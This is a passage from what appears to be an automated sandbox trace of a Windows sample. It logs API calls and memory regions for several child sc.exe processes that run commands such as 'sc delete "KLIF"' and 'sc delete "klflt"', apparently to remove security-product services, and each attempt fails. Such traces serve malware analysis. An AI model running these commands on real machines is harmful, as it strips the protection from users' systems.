returned -13 [0079.644] _wcsicmp (_String1="delete", _String2="qprivs") returned -13 [0079.644] _wcsicmp (_String1="delete", _String2="qfailureflag") returned -13 [0079.644] _wcsicmp (_String1="delete", _String2="qtriggerinfo") returned -13 [0079.644] _wcsicmp (_String1="delete", _String2="qsidtype") returned -13 [0079.644] _wcsicmp (_String1="delete", _String2="showsid") returned -15 [0079.644] _wcsicmp (_String1="delete", _String2="qpreferrednode") returned -13 [0079.644] _wcsicmp (_String1="delete", _String2="qmanagedaccount") returned -13 [0079.644] _wcsicmp (_String1="delete", _String2="querylock") returned -13 [0079.644] _wcsicmp (_String1="delete", _String2="qprotection") returned -13 [0079.644] _wcsicmp (_String1="delete", _String2="lock") returned -8 [0079.644] _wcsicmp (_String1="delete", _String2="delete") returned 0 [0079.644] ResolveDelayLoadedAPI () returned 0x7ffc02114740 [0079.645] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x1) returned 0x77dcc38dd0 [0079.649] OpenServiceW (hSCManager=0x77dcc38dd0, lpServiceName="WRSVC", dwDesiredAccess=0x10000) returned 0x0 [0079.650] GetLastError () returned 0x424 [0079.650] _ultow (in: _Dest=0x424, _Radix=-592841016 | out: _Dest=0x424) returned="1060" [0079.650] FormatMessageW (in: dwFlags=0x1200, lpSource=0x0, dwMessageId=0x424, dwLanguageId=0x0, lpBuffer=0x7ff67ae41640, nSize=0x400, Arguments=0x0 | out: lpBuffer="The specified service does not exist as an installed service.\r\n") returned 0x3f [0079.651] FormatMessageW (in: dwFlags=0x2900, lpSource=0x0, dwMessageId=0x65, dwLanguageId=0x0, lpBuffer=0x77dca9f680, nSize=0x2, Arguments=0x77dca9f6b0 | out: lpBuffer="鎰w") returned 0x62 [0079.652] GetFileType (hFile=0x24) returned 0x2 [0079.652] GetConsoleMode (in: hConsoleHandle=0x24, lpMode=0x77dca9f630 | out: lpMode=0x77dca9f630) returned 1 [0079.671] WriteConsoleW (in: hConsoleOutput=0x24, lpBuffer=0x77dcc393b0*, nNumberOfCharsToWrite=0x62, lpNumberOfCharsWritten=0x77dca9f628, lpReserved=0x0 | out: lpBuffer=0x77dcc393b0*, lpNumberOfCharsWritten=0x77dca9f628*=0x62) returned 1 [0079.671] LocalFree (hMem=0x77dcc393b0) returned 0x0 [0079.671] LocalFree (hMem=0x0) returned 0x0 [0079.671] CloseServiceHandle (hSCObject=0x77dcc38dd0) returned 1 [0079.671] LocalFree (hMem=0x0) returned 0x0 [0079.671] exit (_Code=1060) Thread: id = 350 os_tid = 0x1348 Process: id = "57" image_name = "sc.exe" filename = "c:\\windows\\system32\\sc.exe" page_root = "0xf01b000" os_pid = "0xd9c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0xb14" cmd_line = "sc delete \"KLIF\"" cur_dir = "C:\\Users\\CIiHmnxMn6Ps\\Desktop\\" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0001714b" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 1244 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 1245 start_va = 0xfabf170000 end_va = 0xfabf18ffff entry_point = 0x0 region_type = private name = "private_0x000000fabf170000" filename = "" Region: id = 1246 start_va = 0xfabf190000 end_va = 0xfabf1a3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000fabf190000" filename = "" Region: id = 1247 start_va = 0xfabf1b0000 end_va = 0xfabf22ffff entry_point = 0x0 region_type = private name = "private_0x000000fabf1b0000" filename = "" Region: id = 1248 start_va = 0xfabf230000 end_va = 0xfabf233fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000fabf230000" filename = "" Region: id = 1249 start_va = 0xfabf240000 end_va = 0xfabf240fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000fabf240000" filename = "" Region: id = 1250 start_va = 0xfabf250000 end_va = 0xfabf251fff entry_point = 0x0 region_type = private name = "private_0x000000fabf250000" filename = "" Region: id = 1251 start_va = 0x7df5ffa20000 end_va = 0x7ff5ffa1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ffa20000" filename = "" Region: id = 1252 start_va = 0x7ff67a920000 end_va = 0x7ff67a942fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff67a920000" filename = "" Region: id = 1253 start_va = 0x7ff67a94b000 end_va = 0x7ff67a94bfff entry_point = 0x0 region_type = private name = "private_0x00007ff67a94b000" filename = "" Region: id = 1254 start_va = 0x7ff67a94e000 end_va = 0x7ff67a94ffff entry_point = 0x0 region_type = private name = "private_0x00007ff67a94e000" filename = "" Region: id = 1255 start_va = 0x7ff67ae30000 end_va = 0x7ff67ae45fff entry_point = 0x7ff67ae30000 region_type = mapped_file name = "sc.exe" filename = "\\Windows\\System32\\sc.exe" (normalized: "c:\\windows\\system32\\sc.exe") Region: id = 1256 start_va = 0x7ffc03e70000 end_va = 0x7ffc04031fff entry_point = 0x7ffc03e70000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 1696 start_va = 0xfabf290000 end_va = 0xfabf38ffff entry_point = 0x0 region_type = private name = "private_0x000000fabf290000" filename = "" Region: id = 1697 start_va = 0x7ffc01360000 end_va = 0x7ffc0153cfff entry_point = 0x7ffc01360000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 1698 start_va = 0x7ffc03dc0000 end_va = 0x7ffc03e6cfff entry_point = 0x7ffc03dc0000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 5472 start_va = 0xfabf170000 end_va = 0xfabf17ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000fabf170000" filename = "" Region: id = 5473 start_va = 0xfabf180000 end_va = 0xfabf186fff entry_point = 0x0 region_type = private name = "private_0x000000fabf180000" filename = "" Region: id = 5474 start_va = 0xfabf390000 end_va = 0xfabf44dfff entry_point = 0xfabf390000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 5475 start_va = 0xfabf450000 end_va = 0xfabf4cffff entry_point = 0x0 region_type = private name = "private_0x000000fabf450000" filename = "" Region: id = 5476 start_va = 0xfabf5b0000 end_va = 0xfabf5bffff entry_point = 0x0 region_type = private name = "private_0x000000fabf5b0000" filename = "" Region: id = 5477 start_va = 0x7ff67a820000 end_va = 0x7ff67a91ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff67a820000" filename = "" Region: id = 5478 start_va = 0x7ff67a94c000 end_va = 0x7ff67a94dfff entry_point = 0x0 region_type = private name = "private_0x00007ff67a94c000" filename = "" Region: id = 5479 start_va = 0x7ffc01dd0000 end_va = 0x7ffc01ef5fff entry_point = 0x7ffc01dd0000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 5480 start_va = 0x7ffc02060000 end_va = 0x7ffc020fcfff entry_point = 0x7ffc02060000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 5486 start_va = 0x7ffc02100000 end_va = 0x7ffc0215afff entry_point = 0x7ffc02100000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 5487 start_va = 0xfabf260000 end_va = 0xfabf266fff entry_point = 0x0 region_type = private name = "private_0x000000fabf260000" filename = "" Region: id = 5488 start_va = 0xfabf4d0000 end_va = 0xfabf5aefff entry_point = 0xfabf4d0000 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\System32\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\kernelbase.dll.mui") Region: id = 5489 start_va = 0xfabf270000 end_va = 0xfabf281fff entry_point = 0xfabf270000 region_type = mapped_file name = "sc.exe.mui" filename = "\\Windows\\System32\\en-US\\sc.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\sc.exe.mui") Thread: id = 85 os_tid = 0xda0 [0079.414] GetModuleHandleW (lpModuleName=0x0) returned 0x7ff67ae30000 [0079.414] __set_app_type (_Type=0x1) [0079.414] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x7ff67ae31f00) returned 0x0 [0079.414] __wgetmainargs (in: _Argc=0x7ff67ae41028, _Argv=0x7ff67ae41030, _Env=0x7ff67ae41038, _DoWildCard=0, _StartInfo=0x7ff67ae41044 | out: _Argc=0x7ff67ae41028, _Argv=0x7ff67ae41030, _Env=0x7ff67ae41038) returned 0 [0079.414] SetThreadUILanguage (LangId=0x0) returned 0x409 [0079.529] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0079.529] GetStdHandle (nStdHandle=0xfffffff5) returned 0x24 [0079.529] wcsncmp (_String1="de", _String2="\\\\", _MaxCount=0x2) returned 8 [0079.529] _wcsicmp (_String1="delete", _String2="query") returned -13 [0079.529] _wcsicmp (_String1="delete", _String2="queryex") returned -13 [0079.529] _wcsicmp (_String1="delete", _String2="start") returned -15 [0079.529] _wcsicmp (_String1="delete", _String2="pause") returned -12 [0079.529] _wcsicmp (_String1="delete", _String2="interrogate") returned -5 [0079.529] _wcsicmp (_String1="delete", _String2="control") returned 1 [0079.529] _wcsicmp (_String1="delete", _String2="continue") returned 1 [0079.529] _wcsicmp (_String1="delete", _String2="stop") returned -15 [0079.529] _wcsicmp (_String1="delete", _String2="config") returned 1 [0079.529] _wcsicmp (_String1="delete", _String2="description") returned -7 [0079.529] _wcsicmp (_String1="delete", _String2="failure") returned -2 [0079.529] _wcsicmp (_String1="delete", _String2="privs") returned -12 [0079.529] _wcsicmp (_String1="delete", _String2="failureflag") returned -2 [0079.529] _wcsicmp (_String1="delete", _String2="triggerinfo") returned -16 [0079.529] _wcsicmp (_String1="delete", _String2="sidtype") returned -15 [0079.529] _wcsicmp (_String1="delete", _String2="managedaccount") returned -9 [0079.529] _wcsicmp (_String1="delete", _String2="preferrednode") returned -12 [0079.529] _wcsicmp (_String1="delete", _String2="qc") returned -13 [0079.529] _wcsicmp (_String1="delete", _String2="qdescription") returned -13 [0079.529] _wcsicmp (_String1="delete", _String2="qfailure") returned -13 [0079.529] _wcsicmp (_String1="delete", _String2="qprivs") returned -13 [0079.529] _wcsicmp (_String1="delete", _String2="qfailureflag") returned -13 [0079.529] _wcsicmp (_String1="delete", _String2="qtriggerinfo") returned -13 [0079.529] _wcsicmp (_String1="delete", _String2="qsidtype") returned -13 [0079.529] _wcsicmp (_String1="delete", _String2="showsid") returned -15 [0079.529] _wcsicmp (_String1="delete", _String2="qpreferrednode") returned -13 [0079.529] _wcsicmp (_String1="delete", _String2="qmanagedaccount") returned -13 [0079.529] _wcsicmp (_String1="delete", _String2="querylock") returned -13 [0079.529] _wcsicmp (_String1="delete", _String2="qprotection") returned -13 [0079.529] _wcsicmp (_String1="delete", _String2="lock") returned -8 [0079.529] _wcsicmp (_String1="delete", _String2="delete") returned 0 [0079.529] ResolveDelayLoadedAPI () returned 0x7ffc02114740 [0079.531] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x1) returned 0xfabf298b50 [0079.535] OpenServiceW (hSCManager=0xfabf298b50, lpServiceName="KLIF", dwDesiredAccess=0x10000) returned 0x0 [0079.535] GetLastError () returned 0x424 [0079.535] _ultow (in: _Dest=0x424, _Radix=-1088227192 | out: _Dest=0x424) returned="1060" [0079.535] FormatMessageW (in: dwFlags=0x1200, lpSource=0x0, dwMessageId=0x424, dwLanguageId=0x0, lpBuffer=0x7ff67ae41640, nSize=0x400, Arguments=0x0 | out: lpBuffer="The specified service does not exist as an installed service.\r\n") returned 0x3f [0079.537] FormatMessageW (in: dwFlags=0x2900, lpSource=0x0, dwMessageId=0x65, dwLanguageId=0x0, lpBuffer=0xfabf22f840, nSize=0x2, Arguments=0xfabf22f870 | out: lpBuffer="鎠뼩ú") returned 0x62 [0079.537] GetFileType (hFile=0x24) returned 0x2 [0079.537] GetConsoleMode (in: hConsoleHandle=0x24, lpMode=0xfabf22f7f0 | out: lpMode=0xfabf22f7f0) returned 1 [0079.565] WriteConsoleW (in: hConsoleOutput=0x24, lpBuffer=0xfabf2993a0*, nNumberOfCharsToWrite=0x62, lpNumberOfCharsWritten=0xfabf22f7e8, lpReserved=0x0 | out: lpBuffer=0xfabf2993a0*, lpNumberOfCharsWritten=0xfabf22f7e8*=0x62) returned 1 [0079.566] LocalFree (hMem=0xfabf2993a0) returned 0x0 [0079.566] LocalFree (hMem=0x0) returned 0x0 [0079.566] CloseServiceHandle (hSCObject=0xfabf298b50) returned 1 [0079.566] LocalFree (hMem=0x0) returned 0x0 [0079.566] exit (_Code=1060) Thread: id = 349 os_tid = 0x1344 Process: id = "58" image_name = "sc.exe" filename = "c:\\windows\\system32\\sc.exe" page_root = "0x35ee0000" os_pid = "0xda4" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0xb14" cmd_line = "sc delete \"klpd\"" cur_dir = "C:\\Users\\CIiHmnxMn6Ps\\Desktop\\" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0001714b" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 1257 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 1258 start_va = 0x89ee450000 end_va = 0x89ee46ffff entry_point = 0x0 region_type = private name = "private_0x00000089ee450000" filename = "" Region: id = 1259 start_va = 0x89ee470000 end_va = 0x89ee483fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000089ee470000" filename = "" Region: id = 1260 start_va = 0x89ee490000 end_va = 0x89ee50ffff entry_point = 0x0 region_type = private name = "private_0x00000089ee490000" filename = "" Region: id = 1261 start_va = 0x89ee510000 end_va = 0x89ee513fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000089ee510000" filename = "" Region: id = 1262 start_va = 0x89ee520000 end_va = 0x89ee520fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000089ee520000" filename = "" Region: id = 1263 start_va = 0x89ee530000 end_va = 0x89ee531fff entry_point = 0x0 region_type = private name = "private_0x00000089ee530000" filename = "" Region: id = 1264 start_va = 0x7df5ff920000 end_va = 0x7ff5ff91ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ff920000" filename = "" Region: id = 1265 start_va = 0x7ff67aa40000 end_va = 0x7ff67aa62fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff67aa40000" filename = "" Region: id = 1266 start_va = 0x7ff67aa68000 end_va = 0x7ff67aa68fff entry_point = 0x0 region_type = private name = "private_0x00007ff67aa68000" filename = "" Region: id = 1267 start_va = 0x7ff67aa6e000 end_va = 0x7ff67aa6ffff entry_point = 0x0 region_type = private name = "private_0x00007ff67aa6e000" filename = "" Region: id = 1268 start_va = 0x7ff67ae30000 end_va = 0x7ff67ae45fff entry_point = 0x7ff67ae30000 region_type = mapped_file name = "sc.exe" filename = "\\Windows\\System32\\sc.exe" (normalized: "c:\\windows\\system32\\sc.exe") Region: id = 1269 start_va = 0x7ffc03e70000 end_va = 0x7ffc04031fff entry_point = 0x7ffc03e70000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 1699 start_va = 0x89ee5c0000 end_va = 0x89ee6bffff entry_point = 0x0 region_type = private name = "private_0x00000089ee5c0000" filename = "" Region: id = 1700 start_va = 0x7ffc01360000 end_va = 0x7ffc0153cfff entry_point = 0x7ffc01360000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 1701 start_va = 0x7ffc03dc0000 end_va = 0x7ffc03e6cfff entry_point = 0x7ffc03dc0000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 5672 start_va = 0x89ee450000 end_va = 0x89ee45ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000089ee450000" filename = "" Region: id = 5673 start_va = 0x89ee460000 end_va = 0x89ee466fff entry_point = 0x0 region_type = private name = "private_0x00000089ee460000" filename = "" Region: id = 5674 start_va = 0x89ee540000 end_va = 0x89ee5bffff entry_point = 0x0 region_type = private name = "private_0x00000089ee540000" filename = "" Region: id = 5675 start_va = 0x89ee6c0000 end_va = 0x89ee77dfff entry_point = 0x89ee6c0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 5676 start_va = 0x89ee7d0000 end_va = 0x89ee7dffff entry_point = 0x0 region_type = private name = "private_0x00000089ee7d0000" filename = "" Region: id = 5677 start_va = 0x7ff67a940000 end_va = 0x7ff67aa3ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff67a940000" filename = "" Region: id = 5678 start_va = 0x7ff67aa6c000 end_va = 0x7ff67aa6dfff entry_point = 0x0 region_type = private name = "private_0x00007ff67aa6c000" filename = "" Region: id = 5679 start_va = 0x7ffc01dd0000 end_va = 0x7ffc01ef5fff entry_point = 0x7ffc01dd0000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 5680 start_va = 0x7ffc02060000 end_va = 0x7ffc020fcfff entry_point = 0x7ffc02060000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 5687 start_va = 0x7ffc02100000 end_va = 0x7ffc0215afff entry_point = 0x7ffc02100000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 5688 start_va = 0x89ee780000 end_va = 0x89ee786fff entry_point = 0x0 region_type = private name = "private_0x00000089ee780000" filename = "" Region: id = 5689 start_va = 0x89ee7e0000 end_va = 0x89ee8befff entry_point = 0x89ee7e0000 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\System32\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\kernelbase.dll.mui") Region: id = 5690 start_va = 0x89ee790000 end_va = 0x89ee7a1fff entry_point = 0x89ee790000 region_type = mapped_file name = "sc.exe.mui" filename = "\\Windows\\System32\\en-US\\sc.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\sc.exe.mui") Thread: id = 86 os_tid = 0xda8 [0080.604] GetModuleHandleW (lpModuleName=0x0) returned 0x7ff67ae30000 [0080.604] __set_app_type (_Type=0x1) [0080.604] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x7ff67ae31f00) returned 0x0 [0080.604] __wgetmainargs (in: _Argc=0x7ff67ae41028, _Argv=0x7ff67ae41030, _Env=0x7ff67ae41038, _DoWildCard=0, _StartInfo=0x7ff67ae41044 | out: _Argc=0x7ff67ae41028, _Argv=0x7ff67ae41030, _Env=0x7ff67ae41038) returned 0 [0080.605] SetThreadUILanguage (LangId=0x0) returned 0x409 [0080.664] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0080.664] GetStdHandle (nStdHandle=0xfffffff5) returned 0x24 [0080.664] wcsncmp (_String1="de", _String2="\\\\", _MaxCount=0x2) returned 8 [0080.664] _wcsicmp (_String1="delete", _String2="query") returned -13 [0080.664] _wcsicmp (_String1="delete", _String2="queryex") returned -13 [0080.664] _wcsicmp (_String1="delete", _String2="start") returned -15 [0080.665] _wcsicmp (_String1="delete", _String2="pause") returned -12 [0080.665] _wcsicmp (_String1="delete", _String2="interrogate") returned -5 [0080.665] _wcsicmp (_String1="delete", _String2="control") returned 1 [0080.665] _wcsicmp (_String1="delete", _String2="continue") returned 1 [0080.665] _wcsicmp (_String1="delete", _String2="stop") returned -15 [0080.665] _wcsicmp (_String1="delete", _String2="config") returned 1 [0080.665] _wcsicmp (_String1="delete", _String2="description") returned -7 [0080.665] _wcsicmp (_String1="delete", _String2="failure") returned -2 [0080.665] _wcsicmp (_String1="delete", _String2="privs") returned -12 [0080.665] _wcsicmp (_String1="delete", _String2="failureflag") returned -2 [0080.665] _wcsicmp (_String1="delete", _String2="triggerinfo") returned -16 [0080.665] _wcsicmp (_String1="delete", _String2="sidtype") returned -15 [0080.665] _wcsicmp (_String1="delete", _String2="managedaccount") returned -9 [0080.665] _wcsicmp (_String1="delete", _String2="preferrednode") returned -12 [0080.665] _wcsicmp (_String1="delete", _String2="qc") returned -13 [0080.665] _wcsicmp (_String1="delete", _String2="qdescription") returned -13 [0080.665] _wcsicmp (_String1="delete", _String2="qfailure") returned -13 [0080.665] _wcsicmp (_String1="delete", _String2="qprivs") returned -13 [0080.665] _wcsicmp (_String1="delete", _String2="qfailureflag") returned -13 [0080.665] _wcsicmp (_String1="delete", _String2="qtriggerinfo") returned -13 [0080.665] _wcsicmp (_String1="delete", _String2="qsidtype") returned -13 [0080.665] _wcsicmp (_String1="delete", _String2="showsid") returned -15 [0080.665] _wcsicmp (_String1="delete", _String2="qpreferrednode") returned -13 [0080.665] _wcsicmp (_String1="delete", _String2="qmanagedaccount") returned -13 [0080.665] _wcsicmp (_String1="delete", _String2="querylock") returned -13 [0080.665] _wcsicmp (_String1="delete", _String2="qprotection") returned -13 [0080.665] _wcsicmp (_String1="delete", _String2="lock") returned -8 [0080.665] _wcsicmp (_String1="delete", _String2="delete") returned 0 [0080.665] ResolveDelayLoadedAPI () returned 0x7ffc02114740 [0080.666] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x1) returned 0x89ee5c8ca0 [0080.671] OpenServiceW (hSCManager=0x89ee5c8ca0, lpServiceName="klpd", dwDesiredAccess=0x10000) returned 0x0 [0080.671] GetLastError () returned 0x424 [0080.671] _ultow (in: _Dest=0x424, _Radix=-296682808 | out: _Dest=0x424) returned="1060" [0080.671] FormatMessageW (in: dwFlags=0x1200, lpSource=0x0, dwMessageId=0x424, dwLanguageId=0x0, lpBuffer=0x7ff67ae41640, nSize=0x400, Arguments=0x0 | out: lpBuffer="The specified service does not exist as an installed service.\r\n") returned 0x3f [0080.673] FormatMessageW (in: dwFlags=0x2900, lpSource=0x0, dwMessageId=0x65, dwLanguageId=0x0, lpBuffer=0x89ee50fa80, nSize=0x2, Arguments=0x89ee50fab0 | out: lpBuffer="鎠\x89") returned 0x62 [0080.673] GetFileType (hFile=0x24) returned 0x2 [0080.673] GetConsoleMode (in: hConsoleHandle=0x24, lpMode=0x89ee50fa30 | out: lpMode=0x89ee50fa30) returned 1 [0080.678] WriteConsoleW (in: hConsoleOutput=0x24, lpBuffer=0x89ee5c93a0*, nNumberOfCharsToWrite=0x62, lpNumberOfCharsWritten=0x89ee50fa28, lpReserved=0x0 | out: lpBuffer=0x89ee5c93a0*, lpNumberOfCharsWritten=0x89ee50fa28*=0x62) returned 1 [0080.678] LocalFree (hMem=0x89ee5c93a0) returned 0x0 [0080.678] LocalFree (hMem=0x0) returned 0x0 [0080.678] CloseServiceHandle (hSCObject=0x89ee5c8ca0) returned 1 [0080.679] LocalFree (hMem=0x0) returned 0x0 [0080.679] exit (_Code=1060) Thread: id = 366 os_tid = 0x1388 Process: id = "59" image_name = "sc.exe" filename = "c:\\windows\\system32\\sc.exe" page_root = "0x54765000" os_pid = "0xdac" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0xb14" cmd_line = "sc delete \"klflt\"" cur_dir = "C:\\Users\\CIiHmnxMn6Ps\\Desktop\\" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0001714b" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 1270 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 1271 start_va = 0x8abf10000 end_va = 0x8abf2ffff entry_point = 0x0 region_type = private name = "private_0x00000008abf10000" filename = "" Region: id = 1272 start_va = 0x8abf30000 end_va = 0x8abf43fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000008abf30000" filename = "" Region: id = 1273 start_va = 0x8abf50000 end_va = 0x8abfcffff entry_point = 0x0 region_type = private name = "private_0x00000008abf50000" filename = "" Region: id = 1274 start_va = 0x8abfd0000 end_va = 0x8abfd3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000008abfd0000" filename = "" Region: id = 1275 start_va = 0x8abfe0000 end_va = 0x8abfe0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000008abfe0000" filename = "" Region: id = 1276 start_va = 0x8abff0000 end_va = 0x8abff1fff entry_point = 0x0 region_type = private name = "private_0x00000008abff0000" filename = "" Region: id = 1277 start_va = 0x7df5ff5b0000 end_va = 0x7ff5ff5affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ff5b0000" filename = "" Region: id = 1278 start_va = 0x7ff67a600000 end_va = 0x7ff67a622fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff67a600000" filename = "" Region: id = 1279 start_va = 0x7ff67a625000 end_va = 0x7ff67a625fff entry_point = 0x0 region_type = private name = "private_0x00007ff67a625000" filename = "" Region: id = 1280 start_va = 0x7ff67a62e000 end_va = 0x7ff67a62ffff entry_point = 0x0 region_type = private name = "private_0x00007ff67a62e000" filename = "" Region: id = 1281 start_va = 0x7ff67ae30000 end_va = 0x7ff67ae45fff entry_point = 0x7ff67ae30000 region_type = mapped_file name = "sc.exe" filename = "\\Windows\\System32\\sc.exe" (normalized: "c:\\windows\\system32\\sc.exe") Region: id = 1282 start_va = 0x7ffc03e70000 end_va = 0x7ffc04031fff entry_point = 0x7ffc03e70000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 1702 start_va = 0x8ac1e0000 end_va = 0x8ac2dffff entry_point = 0x0 region_type = private name = "private_0x00000008ac1e0000" filename = "" Region: id = 1703 start_va = 0x7ffc01360000 end_va = 0x7ffc0153cfff entry_point = 0x7ffc01360000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 1704 start_va = 0x7ffc03dc0000 end_va = 0x7ffc03e6cfff entry_point = 0x7ffc03dc0000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 5607 start_va = 0x8abf10000 end_va = 0x8abf1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000008abf10000" filename = "" Region: id = 5608 start_va = 0x8abf20000 end_va = 0x8abf26fff entry_point = 0x0 region_type = private name = "private_0x00000008abf20000" filename = "" Region: id = 5609 start_va = 0x8ac000000 end_va = 0x8ac0bdfff entry_point = 0x8ac000000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 5610 start_va = 0x8ac0c0000 end_va = 0x8ac13ffff entry_point = 0x0 region_type = private name = "private_0x00000008ac0c0000" filename = "" Region: id = 5611 start_va = 0x8ac1b0000 end_va = 0x8ac1bffff entry_point = 0x0 region_type = private name = "private_0x00000008ac1b0000" filename = "" Region: id = 5612 start_va = 